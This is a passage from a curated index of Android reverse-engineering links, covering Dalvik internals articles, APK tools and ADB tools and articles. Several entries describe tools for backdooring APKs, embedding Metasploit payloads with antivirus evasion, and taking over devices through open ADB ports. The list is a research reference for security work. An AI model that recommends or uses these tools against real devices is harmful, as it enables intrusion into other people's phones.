[pediy] [[原创]翻译,IDA调试Dalvik](https://bbs.pediy.com/thread-207891.htm) - 2015.12 [Innost] [深入理解Android之Java虚拟机Dalvik](https://blog.csdn.net/Innost/article/details/50377905) - 2015.11 [angelalonso] [Android malware (emmental) dynamic Analysis with ddms (Dalvik Debug Monitor)](http://blog.angelalonso.es/2015/11/android-malware-emmental-dynamic.html) - 2015.07 [Roland] [Dalvik虚拟机中DexClassLookup结构解析](https://blog.csdn.net/Roland_Sun/article/details/46877563) - 2015.07 [Roland] [Dalvik虚拟机中RegisterMap结构解析](https://blog.csdn.net/Roland_Sun/article/details/46832341) - 2015.07 [pnfsoftware] [Android Dalvik, inside OAT, inside ELF](https://www.pnfsoftware.com/blog/android-oat-elf-jeb2-plugin/) - 2014.12 [Luoshengyang] [Dalvik虚拟机垃圾收集(GC)过程分析](https://blog.csdn.net/Luoshengyang/article/details/41822747) - 2014.12 [Luoshengyang] [Dalvik虚拟机为新创建对象分配内存的过程分析](https://blog.csdn.net/Luoshengyang/article/details/41688319) - 2014.12 [Luoshengyang] [Dalvik虚拟机Java堆创建过程分析](https://blog.csdn.net/Luoshengyang/article/details/41581063) - 2014.11 [Luoshengyang] [Dalvik虚拟机垃圾收集机制简要介绍和学习计划](https://blog.csdn.net/Luoshengyang/article/details/41338251) - 2014.07 [hexblog] [IDA Dalvik debugger: tips and tricks](http://www.hexblog.com/?p=809) - 2014.01 [Luoshengyang] [Android ART运行时无缝替换Dalvik虚拟机的过程分析](https://blog.csdn.net/Luoshengyang/article/details/18006645) - 2013.12 [reyammer] [The "behind the scene" of DexWare, a DalvikVM based service for the iCTF 2013.](http://reyammer.blogspot.com/2013/12/the-behind-scene-of-dexware-dalvikvm.html) - 2013.08 [pediy] [[原创]运行时自篡改dalvik字节码delta.apk原理解析(逆向)](https://bbs.pediy.com/thread-176732.htm) - 2013.07 [u011069813] [Dalvik虚拟机相关的可执行程序](https://blog.csdn.net/u011069813/article/details/9290557) - 2013.06 [Luoshengyang] [Dalvik虚拟机进程和线程的创建过程分析](https://blog.csdn.net/Luoshengyang/article/details/8923484) - 2013.05 [volatility] [Automated Volatility Plugin Generation with Dalvik Inspector](https://volatility-labs.blogspot.com/2013/05/automated-volatility-plugin-generation.html) - 2013.05 [pediy] [[转帖]反编译必备文档。。Dalvik虚拟机操作码](https://bbs.pediy.com/thread-172374.htm) - 2013.05 [Luoshengyang] [Dalvik虚拟机JNI方法的注册过程分析](https://blog.csdn.net/Luoshengyang/article/details/8923483) - 2013.05 [Luoshengyang] [Dalvik虚拟机的运行过程分析](https://blog.csdn.net/Luoshengyang/article/details/8914953) - 2013.05 [Luoshengyang] [Dalvik虚拟机的启动过程分析](https://blog.csdn.net/Luoshengyang/article/details/8885792) - 2013.05 [Luoshengyang] [Dalvik虚拟机简要介绍和学习计划](https://blog.csdn.net/Luoshengyang/article/details/8852432) - 2013.04 [pediy] [[翻译]Android安全分析挑战:运行时篡改Dalvik字节码](https://bbs.pediy.com/thread-170381.htm) - 2013.04 [volatility] [Android Application (Dalvik) Memory Analysis & the Chuli Malware](https://volatility-labs.blogspot.com/2013/04/android-application-dalvik-memory.html) - 2012.12 [freebuf] [Android安全之Dalvik虚拟机&反汇编格式视频讲解](http://www.freebuf.com/articles/terminal/6634.html) - 2012.12 [pediy] [[原创]Dalvik寄存器&反汇编格式视频讲解](https://bbs.pediy.com/thread-160415.htm) - 2012.08 [mr] [Android本地服务的启动 - zygote服务及Dalvik环境启动](https://blog.csdn.net/mr_raptor/article/details/7804984) - 2012.05 [lilu] [android中ADT版本问题: java.lang.NoClassDefFoundError和conversion to dalvik format failed with error 1错误](https://blog.csdn.net/lilu_leo/article/details/7552109) - 2011.10 [Melody] [DalVik学习之利器篇--如何使用smali](https://blog.csdn.net/Melody_lu123/article/details/6774834) - 2011.09 [Melody] [DalVik学习之LEB128是神马](https://blog.csdn.net/Melody_lu123/article/details/6774014) - 2010.12 [androidcracking] [what are these empty methods in dalvik?](http://androidcracking.blogspot.com/2010/12/what-are-these-empty-methods-in-dalvik.html) - 2009.12 [mylifewithandroid] [Understanding the Dalvik bytecode with the Dedexer tool](http://mylifewithandroid.blogspot.com/2009/12/understanding-dalvik-bytecode-with.html) - 2008.12 [mylifewithandroid] [The Dalvik opcodes](http://mylifewithandroid.blogspot.com/2008/12/dalvik-opcodes.html) *** ## <a id="884f1a8ba4dc1bba9a0d7ecb748fd28c"></a>APK-Xxx ### <a id="a4b01e00010adcea40d99cd2047eed8b"></a>工具 - [**14704**星][3m] [Java] [tencent/tinker](https://github.com/tencent/tinker) Tinker is a hot-fix solution library for Android, it supports dex, library and resources update without reinstall apk. - [**6265**星][3m] [Java] [droidpluginteam/droidplugin](https://github.com/droidpluginteam/droidplugin) A plugin framework on android,Run any third-party apk without installation, modification or repackage - [**1879**星][1m] [Java] [yeriomin/yalpstore](https://github.com/yeriomin/yalpstore) Download apks from Google Play Store - [**1521**星][6m] [C++] [vaibhavpandeyvpz/apkstudio](https://github.com/vaibhavpandeyvpz/apkstudio) Open-source, cross platform Qt based IDE for reverse-engineering Android application packages. - [**1329**星][1y] [Shell] [dana-at-cp/backdoor-apk](https://github.com/dana-at-cp/backdoor-apk) a shell script that simplifies the process of adding a backdoor to any Android APK file. - [**1215**星][2m] [Java] [javiersantos/piracychecker](https://github.com/javiersantos/piracychecker) An Android library that prevents your app from being pirated / cracked using Google Play Licensing (LVL), APK signature protection and more. API 14+ required. - [**914**星][7y] [Java] [sonyxperiadev/apkanalyser](https://github.com/sonyxperiadev/apkanalyser) ApkAnalyser - [**745**星][2m] [YARA] [rednaga/apkid](https://github.com/rednaga/apkid) Android Application Identifier for Packers, Protectors, Obfuscators and Oddities - PEiD for Android - [**685**星][1m] [Batchfile] [ufologist/onekey-decompile-apk](https://github.com/ufologist/onekey-decompile-apk) 一步到位反编译apk工具(onekey decompile apk) - [**678**星][7y] [Java] [honeynet/apkinspector](https://github.com/honeynet/apkinspector) APKinspector is a powerful GUI tool for analysts to analyze the Android applications. - [**589**星][4m] [Java] [alexzaitsev/apk-dependency-graph](https://github.com/alexzaitsev/apk-dependency-graph) Android class dependency visualizer. This tool helps to visualize the current state of the project. - [**552**星][5y] [Shell] [lxdvs/apk2gold](https://github.com/lxdvs/apk2gold) CLI tool for decompiling Android apps to Java. It does resources! It does Java! Its real easy! - [**544**星][1y] [Java] [jaredrummler/apkparser](https://github.com/jaredrummler/apkparser) APK parser for Android - [**541**星][1m] [Java] [windysha/xpatch](https://github.com/windysha/xpatch) 免Root实现app加载Xposed插件工具。This is a tool to repackage apk file, then the apk can load any xposed modules installed in the device. It is another way to hook an app without root device. - [**502**星][3m] [TS] [shroudedcode/apk-mitm](https://github.com/shroudedcode/apk-mitm) - [**495**星][4m] [Shell] [s0md3v/diggy](https://github.com/s0md3v/Diggy) Extract endpoints from apk files. - [**391**星][6m] [Java] [patrickfav/uber-apk-signer](https://github.com/patrickfav/uber-apk-signer) A cli tool that helps signing and zip aligning single or multiple Android application packages (APKs) with either debug or provided release certificates. It supports v1, v2 and v3 Android signing scheme has an embedded debug keystore and auto verifies after signing. - [**376**星][2y] [Shell] [m4sc3r4n0/evil-droid](https://github.com/m4sc3r4n0/evil-droid) 创建和生成并嵌入APK Payload,用来渗透android平台 - [**332**星][2m] [Shell] [1n3/reverseapk](https://github.com/1n3/reverseapk) Quickly analyze and reverse engineer Android packages - [**304**星][2m] [Shell] [venshine/decompile-apk](https://github.com/venshine/decompile-apk) APK 反编译 - [**289**星][2m] [Py] [abhi-r3v0/adhrit](https://github.com/abhi-r3v0/adhrit) Android Security Suite for APK reversing, in-depth reconnaissance and static bytecode analysis based on Ghera benchmarks. - [**288**星][5m] [Java] [appium/sign](https://github.com/appium/sign) Sign.jar automatically signs an apk with the Android test certificate. - [**283**星][3y] [Java] [fourbrother/icodetools](https://github.com/fourbrother/icodetools) Android中动态自动插入代码到apk中工具 - [**266**星][2y] [Java] [l-jinbin/apksignaturekiller](https://github.com/l-jinbin/apksignaturekiller) 一键破解APK签名校验 - [**253**星][2y] [Java] [godlikewangjun/dexknife-wj](https://github.com/godlikewangjun/dexknife-wj) apk加固插件 带签名校验、dex加密、资源混淆 - [**230**星][4y] [Ruby] [strazzere/apkfuscator](https://github.com/strazzere/apkfuscator) A generic DEX file obfuscator and munger - [**196**星][2m] [Py] [claudiugeorgiu/obfuscapk](https://github.com/claudiugeorgiu/obfuscapk) A black-box obfuscation tool for Android apps - [**190**星][3y] [Py] [andy10101/apkdetecter](https://github.com/andy10101/apkdetecter) Android Apk查壳工具及源代码 - [**181**星][2m] [JS] [chenquincy/app-info-parser](https://github.com/chenquincy/app-info-parser) A javascript parser for parsing .ipa or .apk files. IPA/APK文件 js 解析器 - [**175**星][4m] [Java] [calebfenton/apkfile](https://github.com/calebfenton/apkfile) Android app analysis and feature extraction library - [**168**星][2y] [Py] [certcc/keyfinder](https://github.com/certcc/keyfinder) A tool for finding and analyzing private (and public) key files, including support for Android APK files. - [**161**星][2y] [Java] [iqiyi/dexsplitter](https://github.com/iqiyi/dexsplitter) Analyze contribution rate of each module to the apk size - [**149**星][2y] [Py] [mhelwig/apk-anal](https://github.com/mhelwig/apk-anal) Android APK analyzer based on radare2 and others. - [**148**星][2m] [Py] [yukiarrr/il2cppspy](https://github.com/yukiarrr/il2cppspy) Unity IL2CPP Disassembler (for apk) - [**135**星][5y] [Java] [wanchouchou/apkprotect](https://github.com/wanchouchou/apkprotect) 通付盾第一代安全加固方案 - [**109**星][2m] [Py] [quarkslab/legu_unpacker_2019](https://github.com/quarkslab/legu_unpacker_2019) Scripts to unpack APK protected by Legu - [**107**星][1m] [Py] [zsdlove/apkvulcheck](https://github.com/zsdlove/apkvulcheck) This is a tool to help androidcoder to check the flaws in their projects. - [**107**星][7m] [Py] [alessandrodd/apk_api_key_extractor](https://github.com/alessandrodd/apk_api_key_extractor) Automatically extracts API Keys from APK files - [**106**星][2m] [Py] [virb3/apk-utilities](https://github.com/virb3/apk-utilities) A cross-platform suite of scripts and utilities for working with APK files - [**96**星][2y] [Shell] [adi1090x/hackapk](https://github.com/adi1090x/hackapk) An Advanced Tool For Complete Apk-Modding In Termux ... - [**95**星][2y] [Shell] [jbreed/apkwash](https://github.com/jbreed/apkwash) Android APK Antivirus evasion for msfvenom generated payloads. - [**94**星][6m] [Py] [furniel/apk-changer](https://github.com/furniel/apk-changer) Command line program for modifying apk files - [**85**星][11m] [C++] [kefir500/apk-icon-editor](https://github.com/kefir500/apk-icon-editor) APK editor to easily change APK icons, name and version. - [**83**星][1m] [Py] [wulio/coeus](https://github.com/wulio/coeus) Android apk/sdk Scan包括android apk/sdk 安全审计代码扫描以及国内政策扫描 - [**81**星][1m] [Kotlin] [linkedin/dex-test-parser](https://github.com/linkedin/dex-test-parser) Find all test methods in an Android instrumentation APK - [**79**星][3y] [Ruby] [xc0d3rz/metasploit-apk-embed-payload](https://github.com/xc0d3rz/metasploit-apk-embed-payload) Embed a Metasploit Payload in an Original .Apk File - [**71**星][1m] [Shell] [hax4us/apkmod](https://github.com/hax4us/apkmod) Apkmod can decompile, recompile, sign APK, and bind the payload with any legit APP - [**69**星][3m] [C++] [kefir500/apk-editor-studio](https://github.com/kefir500/apk-editor-studio) Powerful yet easy to use APK editor. - [**65**星][3m] [C++] [sisong/apkdiffpatch](https://github.com/sisong/apkdiffpatch) a C++ library and command-line tools for Zip(Jar,Apk) file Diff & Patch; create minimal delta/differential; support Jar sign(apk v1 sign) & apk v2,v3 sign . - [**62**星][11m] [Py] [andy10101/apksecurityanalysis](https://github.com/andy10101/apksecurityanalysis) ApkSecurityAnalysis - [**61**星][5y] [Py] [hamiltoniancycle/classnamedeobfuscator](https://github.com/hamiltoniancycle/classnamedeobfuscator) Simple script to parse through the .smali files produced by apktool and extract the .source annotation lines. - [**50**星][3y] [Shell] [osm0sis/apk-patcher](https://github.com/osm0sis/apk-patcher) Patch APKs on-the-fly from Android recovery (Proof of Concept) - [**49**星][3y] [Py] [mothran/apkminer](https://github.com/mothran/apkminer) Parallel APK analyzer - [**49**星][2m] [Java] [catherine22/classloader](https://github.com/catherine22/classloader) Loading apks or classes without reinstalling your app. - [**48**星][3y] [Java] [linsea/apkcompare](https://github.com/linsea/apkcompare) A tool to compare 2 version APKs to find out files change. 比较两个版本的APK以找出文件大小变化的工具 - [**47**星][8m] [Py] [cryptax/angeapk](https://github.com/cryptax/angeapk) Encrypting a PNG into an Android application - [**47**星][3y] [Shell] [onbiron/apk-resigner](https://github.com/onbiron/apk-resigner) A bash script utility for resining Android Package (APK) files. - [**46**星][6y] [Py] [funsecurity/apk_binder_script](https://github.com/funsecurity/apk_binder_script) apk binder script - [**42**星][3y] [Shell] [jbreed/apkinjector](https://github.com/jbreed/apkinjector) Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks. - [**40**星][3y] [Py] [h0nus/spynoteshell](https://github.com/h0nus/spynoteshell) Simple Python tool for backdooring apks files (with meterpreter or shell of Metasploit) - [**35**星][9m] [Shell] [robertohuertasm/apk-decompiler](https://github.com/robertohuertasm/apk-decompiler) Small Rust utility to decompile Android apks - [**33**星][3y] [Ruby] [skulltech/apk-payload-injector](https://github.com/skulltech/apk-payload-injector) POC for injecting Metasploit payloads on arbitrary APKs - [**32**星][1y] [Java] [project-artist/dexterous](https://github.com/project-artist/dexterous) Library and standalone CLI tool for apk/dex merging, repackaging and signing. Can also get used as a dex analyzer framework. - [**29**星][2m] [Java] [martinstyk/apkanalyzer](https://github.com/martinstyk/apkanalyzer) Java tool for analyzing Android APK files - [**29**星][3m] [Go] [avast/apkparser](https://github.com/avast/apkparser) APK manifest & resources parsing in Golang. - [**26**星][1y] [Ruby] [ajitsing/apktojava](https://github.com/ajitsing/apktojava) View android apk as java code in gui - [**26**星][4m] [Java] [calebfenton/resequencer](https://github.com/calebfenton/resequencer) Configurable, flexible regex-based APK modification tool. - [**21**星][3y] [Py] [kudelskisecurity/check_all_apks](https://github.com/kudelskisecurity/check_all_apks) Check All APK's -- scripts for checking your phone for malware - [**20**星][5m] [Py] [hexabin/apkstat](https://github.com/hexabin/apkstat) Automated Information Retrieval From APKs For Initial Analysis - [**20**星][3m] [Shell] [gzu-liyujiang/apkdecompiler](https://github.com/gzu-liyujiang/apkdecompiler) 【Linux系统】上apk反编译助手,已打包为ApkDecompiler.deb,支持debian系linux,如debian、ubuntu、mint、deepin等等 - [**20**星][2y] [Go] [phinexdaz/ipapk](https://github.com/phinexdaz/ipapk) ipa or apk parser written in golang, aims to extract app information - [**19**星][5m] [Go] [avast/apkverifier](https://github.com/avast/apkverifier) APK Signature verification in Go. Supports scheme v1, v2 and v3 and passes Google apksig's testing suite. - [**17**星][5y] [JS] [dweinstein/node-aptoide](https://github.com/dweinstein/node-aptoide) aptoide app store APK download - [**15**星][10m] [C] [magisterquis/pcapknock](https://github.com/magisterquis/pcapknock) Watches for trigger packets, runs commands or spawns a shell - [**14**星][4y] [Py] [ryanwsmith/apkinspector](https://bitbucket.org/ryanwsmith/apkinspector) - [**14**星][2y] [Py] [fourspaces/reverse_lianjia_wxapkg](https://github.com/FourSpaces/reverse_lianjia_wxapkg) 逆向链家微信小程序,解析 请求的加密方式获取数据 - [**13**星][3y] [Scala] [fschrofner/glassdoor](https://github.com/fschrofner/glassdoor) glassdoor is a modern, autonomous security framework for Android APKs. POC, unmaintained unfortunately. - [**13**星][2m] [Java] [iamyours/apkcrack](https://github.com/iamyours/apkcrack) A tool that make your apk debuggable for Charles/Fiddler in Android 7.0 - [**12**星][6y] [Ruby] [nvisium/ruby_apk_unpack](https://github.com/nvisium/ruby_apk_unpack) Ruby Gem to Unpack APK(s) - [**12**星][2m] [JS] [shahidcodes/android-nougat-ssl-intercept](https://github.com/shahidcodes/android-nougat-ssl-intercept) It decompiles target apk and adds security exception to accept all certificates thus making able to work with Burp/Charles and Other Tools - [**12**星][2m] [Java] [orhun/apkservinject](https://github.com/orhun/apkservinject) Tool for injecting (smali) services to APK files - [**11**星][8m] [Ruby] [fuzion24/webapkcrawler](https://github.com/fuzion24/webapkcrawler) Uses Google to search for .apks hosted on websites and downloads them - [**9**星][3y] [Py] [voider1/a2scomp](https://github.com/voider1/a2scomp) A tool to make it easier to change the SMALI of an APK - [**8**星][3y] [Shell] [manofftoday/venomdroid3](https://github.com/manofftoday/venomdroid3) Script that easily creates, signs and AV bypass .apk metasploit reverse_tcp payload. - [**7**星][3y] [Ruby] [strazzere/ewmami](https://github.com/strazzere/ewmami) A gem will allow you to query the Google Play APK Verification (AntiMalware) service - [**6**星][1y] [as0ler/android-examples](https://github.com/as0ler/android-examples) APK's used as example Apps for decompiling - [**4**星][1m] [Py] [technowlogy-pushpender/apkinfector](https://github.com/technowlogy-pushpender/apkinfector) Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK - [**3**星][4m] [Shell] [deadport/apkill](https://github.com/deadport/apkill) Pentest script for Aircrack-ng on debianesque systems that makes deauthing clients and catching handshakes of WiFi simple and fast. - [**3**星][12m] [Visual Basic .NET] [pericena/apkcpd](https://github.com/pericena/apkcpd) Compilar aplicaciones apk - [**3**星][11m] [Visual Basic .NET] [pericena/apkdcx](https://github.com/pericena/apkdcx) Los programas nos ayudara a poder descomprimir o descompilar las aplicaciones que son desarrollada en Android, con la extensión”.apk “para poder modificar el código y mejorar la aplicación. - [**2**星][1y] [Py] [thor509/apk_digger](https://github.com/thor509/apk_digger) - [**1**星][1y] [Py] [b11001010/koodous-report-downloader](https://github.com/b11001010/koodous-report-downloader) Get apk's analysis report from - [**1**星][6y] [huyle333/androidmitllctf2013](https://github.com/huyle333/androidmitllctf2013) BUILDS Team 2 Android code from the MIT LL CTF 2013 for future reference. A list of APK files with different functions. - [**0**星][5y] [C++] [raziel23x/apk-gamers-side-shooter](https://github.com/raziel23x/apk-gamers-side-shooter) *** ## <a id="ef7dc42448191170a38b470d6df851fc"></a>ADB ### <a id="ade3cb4479c4d96476509d1d7b4584b8"></a>工具 - [**607**星][5m] [Py] [ashishb/adb-enhanced](https://github.com/ashishb/adb-enhanced) - [**585**星][1m] [Py] [metachar/phonesploit](https://github.com/metachar/phonesploit) Using open Adb ports we can exploit a Andriod Device - [**561**星][2m] [Shell] [corbindavenport/nexus-tools](https://github.com/corbindavenport/nexus-tools) Bash script for quickly installing ADB and Fastboot on macOS and Linux. - [**470**星][7y] [Shell] [kosborn/p2p-adb](https://github.com/kosborn/p2p-adb) Phone to Phone Android Debug Bridge - A project for "debugging" phones... from other phones. - [**401**星][1m] [Java] [rikkaapps/shizuku](https://github.com/rikkaapps/shizuku) Help normal apps using system APIs directly with adb/root privileges through a Java process started with app_process. - [**258**星][2m] [Shell] [4ch12dy/xadb](https://github.com/4ch12dy/xadb) some useful adb commands for android reversing and debugging both 32 and 64 bit and support macOS and win10's MINGW64. - [**242**星][1y] [Py] [tiann/super-adb](https://github.com/tiann/super-adb) Enhance the adb shell using busybox, supporting vi、grep and awk etc. No need root. - [**206**星][3y] [Java] [cgutman/adblib](https://github.com/cgutman/adblib) A Java library implementation of the ADB network protocol - [**206**星][2y] [C#] [labo89/adbgui](https://github.com/labo89/adbgui) Wrapper for Android Debug Bridge (ADB) written in C# - [**148**星][1m] [Shell] [izzysoft/adebar](https://github.com/izzysoft/adebar) Android DEvice Backup And Report, using Bash and ADB - [**125**星][8m] [Ruby] [mttkay/replicant](https://github.com/mttkay/replicant) A REPL for the Android Debug Bridge (ADB) - [**122**星][5y] [irsl/adb-backup-apk-injection](https://github.com/irsl/adb-backup-apk-injection) Android ADB backup APK Injection POC - [**104**星][4m] [Py] [huuck/adbhoney](https://github.com/huuck/adbhoney) Low interaction honeypot designed for Android Debug Bridge over TCP/IP - [**103**星][1m] [JS] [webadb/webadb.js](https://github.com/webadb/webadb.js) ADB host implementation based on WebUSB - [**92**星][2m] [Java] [rikkaapps/wadb](https://github.com/rikkaapps/wadb) A simple switch for adb (Android Debug Bridge) over network. - [**88**星][3m] [Java] [patrickfav/uber-adb-tools](https://github.com/patrickfav/uber-adb-tools) A tool that enables advanced features through adb installing and uninstalling apps like wildcards and multi device support. Useful if you want to clean your test device from all company apks or install a lot of apks in one go. Written in Java so it should run on your platform. - [**41**星][5y] [Py] [techbliss/adb_helper_qt_super_version](https://github.com/techbliss/adb_helper_qt_super_version) All You Need For Ida Pro And Android Debugging - [**39**星][3y] [JS] [naman14/gnome-android-tool](https://github.com/naman14/gnome-android-tool) Gnome shell extension for adb tools - [**33**星][1m] [Py] [entynetproject/ghost](https://github.com/entynetproject/ghost) Ghost Framework is an Android post exploitation framework that uses an Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration. - [**28**星][7m] [Go] [cs8425/go-adbbot](https://github.com/cs8425/go-adbbot) android bot based on adb and golang - [**14**星][1m] [Shell] [ashwin990/adb-toolkit](https://github.com/ashwin990/adb-toolkit) ADB-Toolkit V2 for easy ADB tricks with many perks in all one. ENJOY! - [**8**星][3m] [Lua] [wazehell/remote-adb-scan](https://github.com/wazehell/remote-adb-scan) pure python remote adb scanner + nmap scan module - [**3**星][3y] [prashantmi/android-h](https://github.com/prashantmi/android-h) Android Hacker is a software based on ADB (Android Debug Bridge) and can compromise any "Android Device" ### <a id="0ad73dcc365a651ead2ea75d93c5be9b"></a>文章 - 2020.03 [hakin9] [Ghost Framework - uses an ADB to remotely access an Android device](https://hakin9.org/ghost-framework-uses-an-adb-to-remotely-access-an-android-device/) - 2019.10 [serializethoughts] [RageAgainstTheCage - Revisting Android adb setuid Exhaustion Attack](https://serializethoughts.com/2019/10/28/revisting-rageagainstthecage) - 2019.08 [4hou] [ARES ADB IOT僵尸网络分析](https://www.4hou.com/info/news/20015.html) - 2019.06 [ATTTechChannel] [6/28/19 Cryptocurrency Mining Botnet Arrives Through ADB | AT&T ThreatTraq](https://www.youtube.com/watch?v=qvFetWBF_eo) - 2019.06 [trendmicro] [Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH](https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-botnet-arrives-through-adb-and-spreads-through-ssh/) - 2019.06 [HackerSploit] [Exploiting Android Through ADB With PhoneSploit](https://www.youtube.com/watch?v=ONHxcGMdkM0) - 2019.03 [urlteam] [Android自动化之-解锁系列-ADB解锁锁屏与模拟九宫格密码](https://www.urlteam.org/2019/03/android%e8%87%aa%e5%8a%a8%e5%8c%96%e4%b9%8b-%e8%a7%a3%e9%94%81%e7%b3%bb%e5%88%97-adb%e8%a7%a3%e9%94%81%e9%94%81%e5%b1%8f%e4%b8%8e%e6%a8%a1%e6%8b%9f%e4%b9%9d%e5%ae%ab%e6%a0%bc%e5%af%86%e7%a0%81/) - 2019.03 [urlteam] [Android自动化之-解锁系列-ADB解锁锁屏与模拟九宫格密码](https://www.urlteam.org/2019/03/android%e8%87%aa%e5%8a%a8%e5%8c%96%e4%b9%8b-%e8%a7%a3%e9%94%81%e7%b3%bb%e5%88%97-adb%e8%a7%a3%e9%94%81%e9%94%81%e5%b1%8f%e4%b8%8e%e6%a8%a1%e6%8b%9f%e4%b9%9d%e5%ae%ab%e6%a0%bc%e5%af%86%e7%a0%81/) - 2019.03 [urlteam] [Android自动化之-解锁系列-ADB解锁锁屏与模拟九宫格密码](https://www.urlteam.cn/2019/03/android%e8%87%aa%e5%8a%a8%e5%8c%96%e4%b9%8b-%e8%a7%a3%e9%94%81%e7%b3%bb%e5%88%97-adb%e8%a7%a3%e9%94%81%e9%94%81%e5%b1%8f%e4%b8%8e%e6%a8%a1%e6%8b%9f%e4%b9%9d%e5%ae%ab%e6%a0%bc%e5%af%86%e7%a0%81/) - 2019.03 [urlteam] [Android自动化之-ADB与ADB shell常用命令](https://www.urlteam.cn/2019/03/android%e8%87%aa%e5%8a%a8%e5%8c%96%e4%b9%8b-adb%e4%b8%8eadb-shell%e5%b8%b8%e7%94%a8%e5%91%bd%e4%bb%a4/) - 2019.01 [freebuf] [Android取证:使用ADB和DD对文件系统做镜像](https://www.freebuf.com/articles/terminal/193354.html) - 2018.12 [nsfocus] [ADB. Mirai: 利用ADB调试接口进行传播的Mirai新型变种僵尸网络](http://blog.nsfocus.net/adb-mirai-variant-botnet/) - 2018.12 [pediy] [[原创]利用无线ADB调试设计缺陷监控Android设备](https://bbs.pediy.com/thread-248574.htm) - 2018.12 [andreafortuna] [Android取证: 使用ADB和DD对文件系统做镜像](https://www.andreafortuna.org/dfir/android-forensics-imaging-android-file-system-using-adb-and-dd/) - 2018.10 [ixiacom] [Trinity - P2P Malware Over ADB](https://www.ixiacom.com/company/blog/trinity-p2p-malware-over-adb) - 2018.09 [bitdefender] [Hide and Seek IoT Botnet Learns New Tricks: Uses ADB over Internet to Exploit Thousands of Android Devices](https://labs.bitdefender.com/2018/09/hide-and-seek-iot-botnet-learns-new-tricks-uses-adb-over-internet-to-exploit-thousands-of-android-devices/) - 2018.08 [madrobot] [Exploiting Android Devices Running Insecure Remote ADB Service](https://medium.com/p/4490cc6a2282) - 2018.08 [freebuf] [Satori变种利用开放的ADB端口在Android设备中传播](http://www.freebuf.com/vuls/178914.html) - 2018.07 [4hou] [开放的ADB端口被用于在Android设备中传播Satori变体](http://www.4hou.com/vulnerable/12760.html) - 2018.07 [trendmicro] [Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices](https://blog.trendmicro.com/trendlabs-security-intelligence/open-adb-ports-being-exploited-to-spread-possible-satori-variant-in-android-devices/) - 2018.07 [ironcastle] [Worm (Mirai?) Exploiting Android Debug Bridge (Port 5555/tcp), (Tue, Jul 10th)](https://www.ironcastle.net/worm-mirai-exploiting-android-debug-bridge-port-5555tcp-tue-jul-10th/) - 2018.07 [sans] [Worm (Mirai?) Exploiting Android Debug Bridge (Port 5555/tcp)](https://isc.sans.edu/forums/diary/Worm+Mirai+Exploiting+Android+Debug+Bridge+Port+5555tcp/23856/) - 2018.02 [freebuf] [ADB配置提权漏洞(CVE-2017-13212)原理与利用分析](http://www.freebuf.com/articles/terminal/161843.html) - 2018.02 [freebuf] [ADB.Miner:恶意代码正在利用开放了ADB 接口的安卓设备挖矿](http://www.freebuf.com/articles/terminal/162096.html) - 2018.02 [hispasec] [ADB.Miner: nueva botnet dedicada al minado de criptomonedas](http://unaaldia.hispasec.com/2018/02/adbminer-nueva-botnet-dedicada-al.html) - 2018.02 [360] [ADB.Miner: More Information](http://blog.netlab.360.com/adb-miner-more-information-en/) - 2018.02 [360] [ADB.Miner 安卓蠕虫的更多信息](http://blog.netlab.360.com/adb-miner-more-information/) - 2018.02 [360] [ADB.Miner:恶意代码正在利用开放了ADB 接口的安卓设备挖矿](https://www.anquanke.com/post/id/97422/) - 2018.02 [360] [Early Warning: ADB.Miner A Mining Botnet Utilizing Android ADB Is Now Rapidly Spreading](http://blog.netlab.360.com/early-warning-adb-miner-a-mining-botnet-utilizing-android-adb-is-now-rapidly-spreading-en/) - 2018.02 [360] [ADB.Miner:恶意代码正在利用开放了ADB 接口的安卓设备挖矿](http://blog.netlab.360.com/early-warning-adb-miner-a-mining-botnet-utilizing-android-adb-is-now-rapidly-spreading/) - 2017.08 [pediy] [[原创]通过ADB与activity管理器交互](https://bbs.pediy.com/thread-220710.htm) - 2017.03 [nxadmin] [adb连接海马玩模拟器](http://www.nxadmin.com/tools/1535.html) - 2016.01 [jeffvanderstoep] [Android: How to run your script/binary from adb in the application sandbox](http://jeffvanderstoep.blogspot.com/2016/01/android-how-to-run-executable-from-adb.html) - 2015.05 [flanker017] [ADB backupAgent 提权漏洞分析 (CVE-2014-7953)](https://blog.flanker017.me/adb-backupagent-%e6%8f%90%e6%9d%83%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90-%ef%bc%88cve-2014-7953%ef%bc%89/) - 2014.06 [pediy] [[原创]ADB学习笔记2——adb_main和其相关数据结构](https://bbs.pediy.com/thread-188887.htm) - 2014.06 [pediy] [[原创]adb学习笔记1——adb流程简介](https://bbs.pediy.com/thread-188886.htm) - 2014.02 [21cnbao] [Android adb setuid提权漏洞的分析](https://blog.csdn.net/21cnbao/article/details/19040451) - 2013.08 [pediy] [[原创]通过adb悄悄安装apk并启动](https://bbs.pediy.com/thread-178017.htm) - 2013.06 [u011069813] [开启了ADB,就等于配了一把家门钥匙给别人!](https://blog.csdn.net/u011069813/article/details/9198419) - 2013.06 [u011069813] [adb 增加认证功能](https://blog.csdn.net/u011069813/article/details/9198093) - 2013.06 [freebuf] [Android ICS adb调试工具系统还原目录遍历漏洞(可提权)](http://www.freebuf.com/vuls/10697.html) - 2013.06 [lhj0711010212] [Android adb shell启动应用程序的方法](https://blog.csdn.net/lhj0711010212/article/details/9036179) - 2013.05 [lhj0711010212] [Android之adb环境变量配置标签](https://blog.csdn.net/lhj0711010212/article/details/8974094) - 2013.05 [lhj0711010212] [adb uninstall卸载apk文件说明](https://blog.csdn.net/lhj0711010212/article/details/8931328) - 2013.01 [arduino] [An Arduino-based ADB-to-USB adapter for NeXT keyboards](https://blog.arduino.cc/2013/01/10/an-arduino-based-adb-to-usb-adapter-for-next-keyboards/) - 2012.12 [trustwave] [Abusing the Android Debug Bridge](https://www.trustwave.com/Resources/SpiderLabs-Blog/Abusing-the-Android-Debug-Bridge/) - 2012.12 [xianming01] [android基础知识12:android自动化测试06—Instrumentation 06 adb shell am](https://blog.csdn.net/xianming01/article/details/8286603) - 2012.08 [jinzhuojun] [bash: ./adb: No such file or directory](https://blog.csdn.net/jinzhuojun/article/details/7829525) - 2012.08 [jinzhuojun] [VirtualBox中从guest系统中用adb与连在host上的设备通信](https://blog.csdn.net/jinzhuojun/article/details/7827564) - 2012.05 